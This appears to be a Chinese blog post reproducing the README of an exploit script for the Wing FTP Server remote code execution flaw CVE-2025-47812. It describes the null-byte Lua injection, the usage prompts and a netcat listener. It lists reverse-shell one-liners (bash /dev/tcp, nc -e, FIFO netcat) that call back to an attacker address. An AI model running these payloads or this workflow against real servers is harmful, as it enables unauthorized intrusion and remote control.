Wing FTP Server远程代码执行漏洞利用详解(CVE-2025-47812)

本文详细分析了Wing FTP Server中存在的空字节处理不当漏洞(CVE-2025-47812),该漏洞允许未经认证的攻击者通过登录表单注入Lua代码并执行系统命令,CVSS评分高达10.0分。

CVE-2025-47812 - Wing FTP Server远程代码执行(RCE)

===========================================================

作者:blindma1den

日期:2025年7月

漏洞类型:远程代码执行(未认证)

目标:Wing FTP Server < 7.4.4

CVSS评分:10.0(严重)


漏洞描述


该脚本利用CVE-2025-47812,这是Wing FTP Server Web界面中的一个严重漏洞, 允许远程攻击者在无需认证的情况下执行任意系统命令或打开反向shell。

该漏洞是由于登录表单(/loginok.html)中对空字节(%00)处理不当造成的。 这允许将Lua代码注入到会话文件中,当访问如/dir.html等端点时这些代码会被执行。


来源


NVD描述:https://nvd.nist.gov/vuln/detail/CVE-2025-47812


功能特性


  • 命令执行(例如:whoamiuname -a
  • 多种反向shell有效载荷
  • 自动提取UID会话cookie
  • 清晰的模块化Python 3实现

环境要求


  • Python 3.7+
  • requests模块

安装依赖:

1
pip install requests

使用方法


运行脚本:

1
python3 wingftp_rce_exploit.py

系统将提示输入:

  • 目标URL(例如:http://127.0.0.1:5466)
  • 用户名(默认:anonymous)
  • 利用模式: [1] 运行命令 [2] 启动反向shell

示例


[1] 运行命令:

1
2
3
4
目标URL:http://192.168.1.10:5466
用户名:anonymous
您的选择(1或2):1
要执行的命令(默认:whoami):whoami

[2] 反向shell:

1
2
3
4
5
目标URL:http://192.168.1.10:5466
用户名:anonymous
您的选择(1或2):2
反向shell IP地址:192.168.1.100
反向shell端口:4444

在触发shell之前启动监听器:

1
nc -lvnp 4444

使用的有效载荷(反向shell)


Bash: bash -i >& /dev/tcp/IP/PORT 0>&1

Python3: python3 -c ‘import socket,subprocess,os; …’

Netcat: nc IP PORT -e /bin/sh

PHP: php -r ‘$sock=fsockopen(“IP”,PORT); …’

FIFO + Netcat: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i …


免责声明


此代码仅用于教育目的。请勿在您不拥有或未经明确授权测试的系统上使用此漏洞利用程序。 未经授权使用是非法的且不道德的。

请立即修补您的系统。Wing FTP Server 7.4.4版本修复了此漏洞。

祝黑客愉快!

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计